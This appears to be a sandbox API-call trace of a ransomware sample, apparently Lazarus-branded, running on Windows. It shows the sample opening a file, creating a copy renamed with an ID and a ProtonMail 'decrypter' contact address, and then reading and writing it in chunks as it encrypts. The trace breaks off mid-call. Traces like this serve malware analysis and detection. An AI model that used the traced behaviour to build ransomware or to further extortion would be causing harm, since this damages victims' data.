[0070.418] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.418] GetFileType (hFile=0x41c) returned 0x1 [0070.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0070.418] CloseHandle (hObject=0x41c) returned 1 [0070.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0070.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0070.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0070.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0070.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0070.419] AreFileApisANSI () returned 1 [0070.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0070.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 45 [0070.419] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a)) returned 1 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0070.419] AreFileApisANSI () returned 1 [0070.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0070.420] GetLastError () returned 0x0 [0070.420] SetLastError (dwErrCode=0x0) [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b450 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0070.420] GetLastError () returned 0x0 [0070.420] SetLastError (dwErrCode=0x0) [0070.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71758 [0070.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0070.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.420] AreFileApisANSI () returned 1 [0070.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0070.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0070.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0070.421] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.538] GetFileType (hFile=0x428) returned 0x1 [0070.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0070.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0070.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.538] AreFileApisANSI () returned 1 [0070.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0070.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0070.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 45 [0070.539] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.539] GetFileType (hFile=0x418) returned 0x1 [0070.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0070.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0070.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.539] GetLastError () returned 0x0 [0070.539] SetLastError (dwErrCode=0x0) [0070.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.539] GetLastError () returned 0x0 [0070.539] SetLastError (dwErrCode=0x0) [0070.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0070.539] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0070.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0070.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0070.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0070.600] GetLastError () returned 0x0 [0070.600] SetLastError (dwErrCode=0x0) [0070.600] GetLastError () returned 0x0 [0070.600] SetLastError (dwErrCode=0x0) [0070.601] GetLastError () returned 0x0 [0070.601] SetLastError (dwErrCode=0x0) [0070.601] GetLastError () returned 0x0 [0070.601] SetLastError (dwErrCode=0x0) [0070.601] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.601] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.602] GetLastError () returned 0x0 [0070.602] SetLastError (dwErrCode=0x0) [0070.603] GetLastError () returned 0x0 [0070.603] SetLastError (dwErrCode=0x0) [0070.603] GetLastError () returned 0x0 [0070.603] SetLastError (dwErrCode=0x0) [0070.603] GetLastError () returned 0x0 [0070.603] SetLastError (dwErrCode=0x0) [0070.603] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.603] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.603] GetLastError () returned 0x0 [0070.603] SetLastError (dwErrCode=0x0) [0070.603] GetLastError () returned 0x0 [0070.603] SetLastError (dwErrCode=0x0) [0070.604] GetLastError () returned 0x0 [0070.604] SetLastError (dwErrCode=0x0) [0070.604] GetLastError () returned 0x0 [0070.604] SetLastError (dwErrCode=0x0) [0070.604] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.604] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.604] GetLastError () returned 0x0 [0070.604] SetLastError (dwErrCode=0x0) [0070.604] GetLastError () returned 0x0 [0070.604] SetLastError (dwErrCode=0x0) [0070.604] GetLastError () returned 0x0 [0070.604] SetLastError (dwErrCode=0x0) [0070.605] GetLastError () returned 0x0 [0070.605] SetLastError (dwErrCode=0x0) [0070.605] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.605] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.605] GetLastError () returned 0x0 [0070.605] SetLastError (dwErrCode=0x0) [0070.605] GetLastError () returned 0x0 [0070.605] SetLastError (dwErrCode=0x0) [0070.605] GetLastError () returned 0x0 [0070.605] SetLastError (dwErrCode=0x0) [0070.605] GetLastError () returned 0x0 [0070.605] SetLastError (dwErrCode=0x0) [0070.605] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.606] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.606] GetLastError () returned 0x0 [0070.606] SetLastError (dwErrCode=0x0) [0070.606] GetLastError () returned 0x0 [0070.606] SetLastError (dwErrCode=0x0) [0070.606] GetLastError () returned 0x0 [0070.606] SetLastError (dwErrCode=0x0) [0070.606] GetLastError () returned 0x0 [0070.606] SetLastError (dwErrCode=0x0) [0070.606] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.606] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.607] GetLastError () returned 0x0 [0070.607] SetLastError (dwErrCode=0x0) [0070.607] GetLastError () returned 0x0 [0070.607] SetLastError (dwErrCode=0x0) [0070.607] GetLastError () returned 0x0 [0070.607] SetLastError (dwErrCode=0x0) [0070.607] GetLastError () returned 0x0 [0070.607] SetLastError (dwErrCode=0x0) [0070.607] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.607] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.607] GetLastError () returned 0x0 [0070.608] SetLastError (dwErrCode=0x0) [0070.608] GetLastError () returned 0x0 [0070.608] SetLastError (dwErrCode=0x0) [0070.608] GetLastError () returned 0x0 [0070.608] SetLastError (dwErrCode=0x0) [0070.608] GetLastError () returned 0x0 [0070.608] SetLastError (dwErrCode=0x0) [0070.608] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.608] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.609] GetLastError () returned 0x0 [0070.609] SetLastError (dwErrCode=0x0) [0070.609] GetLastError () returned 0x0 [0070.609] SetLastError (dwErrCode=0x0) [0070.609] GetLastError () returned 0x0 [0070.609] SetLastError (dwErrCode=0x0) [0070.609] GetLastError () returned 0x0 [0070.609] SetLastError (dwErrCode=0x0) [0070.609] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.609] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.610] GetLastError () returned 0x0 [0070.610] SetLastError (dwErrCode=0x0) [0070.610] GetLastError () returned 0x0 [0070.610] SetLastError (dwErrCode=0x0) [0070.610] GetLastError () returned 0x0 [0070.610] SetLastError (dwErrCode=0x0) [0070.610] GetLastError () returned 0x0 [0070.610] SetLastError (dwErrCode=0x0) [0070.610] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.610] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.610] GetLastError () returned 0x0 [0070.610] SetLastError (dwErrCode=0x0) [0070.611] GetLastError () returned 0x0 [0070.611] SetLastError (dwErrCode=0x0) [0070.611] GetLastError () returned 0x0 [0070.611] SetLastError (dwErrCode=0x0) [0070.611] GetLastError () returned 0x0 [0070.611] SetLastError (dwErrCode=0x0) [0070.611] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.611] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.611] GetLastError () returned 0x0 [0070.611] SetLastError (dwErrCode=0x0) [0070.611] GetLastError () returned 0x0 [0070.611] SetLastError (dwErrCode=0x0) [0070.611] GetLastError () returned 0x0 [0070.612] SetLastError (dwErrCode=0x0) [0070.612] GetLastError () returned 0x0 [0070.612] SetLastError (dwErrCode=0x0) [0070.612] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.612] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.612] GetLastError () returned 0x0 [0070.612] SetLastError (dwErrCode=0x0) [0070.612] GetLastError () returned 0x0 [0070.612] SetLastError (dwErrCode=0x0) [0070.612] GetLastError () returned 0x0 [0070.612] SetLastError (dwErrCode=0x0) [0070.613] GetLastError () returned 0x0 [0070.613] SetLastError (dwErrCode=0x0) [0070.613] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.613] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.613] GetLastError () returned 0x0 [0070.613] SetLastError (dwErrCode=0x0) [0070.613] GetLastError () returned 0x0 [0070.613] SetLastError (dwErrCode=0x0) [0070.613] GetLastError () returned 0x0 [0070.613] SetLastError (dwErrCode=0x0) [0070.613] GetLastError () returned 0x0 [0070.613] SetLastError (dwErrCode=0x0) [0070.614] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.614] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.614] GetLastError () returned 0x0 [0070.614] SetLastError (dwErrCode=0x0) [0070.614] GetLastError () returned 0x0 [0070.614] SetLastError (dwErrCode=0x0) [0070.614] GetLastError () returned 0x0 [0070.614] SetLastError (dwErrCode=0x0) [0070.614] GetLastError () returned 0x0 [0070.614] SetLastError (dwErrCode=0x0) [0070.614] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.615] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.615] GetLastError () returned 0x0 [0070.615] SetLastError (dwErrCode=0x0) [0070.615] GetLastError () returned 0x0 [0070.615] SetLastError (dwErrCode=0x0) [0070.615] GetLastError () returned 0x0 [0070.615] SetLastError (dwErrCode=0x0) [0070.615] GetLastError () returned 0x0 [0070.615] SetLastError (dwErrCode=0x0) [0070.615] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.615] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.616] GetLastError () returned 0x0 [0070.616] SetLastError (dwErrCode=0x0) [0070.616] GetLastError () returned 0x0 [0070.616] SetLastError (dwErrCode=0x0) [0070.616] GetLastError () returned 0x0 [0070.616] SetLastError (dwErrCode=0x0) [0070.616] GetLastError () returned 0x0 [0070.616] SetLastError (dwErrCode=0x0) [0070.616] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.616] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.616] GetLastError () returned 0x0 [0070.617] SetLastError (dwErrCode=0x0) [0070.617] GetLastError () returned 0x0 [0070.617] SetLastError (dwErrCode=0x0) [0070.617] GetLastError () returned 0x0 [0070.617] SetLastError (dwErrCode=0x0) [0070.617] GetLastError () returned 0x0 [0070.617] SetLastError (dwErrCode=0x0) [0070.617] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.617] WriteFile (in: hFile=0x428, lpBuffer=0x861d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.617] GetLastError () returned 0x0 [0070.617] SetLastError (dwErrCode=0x0) [0070.618] GetLastError () returned 0x0 [0070.618] SetLastError (dwErrCode=0x0) [0070.618] GetLastError () returned 0x0 [0070.618] SetLastError (dwErrCode=0x0) [0070.618] GetLastError () returned 0x0 [0070.618] SetLastError (dwErrCode=0x0) [0070.618] ReadFile (in: hFile=0x418, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, 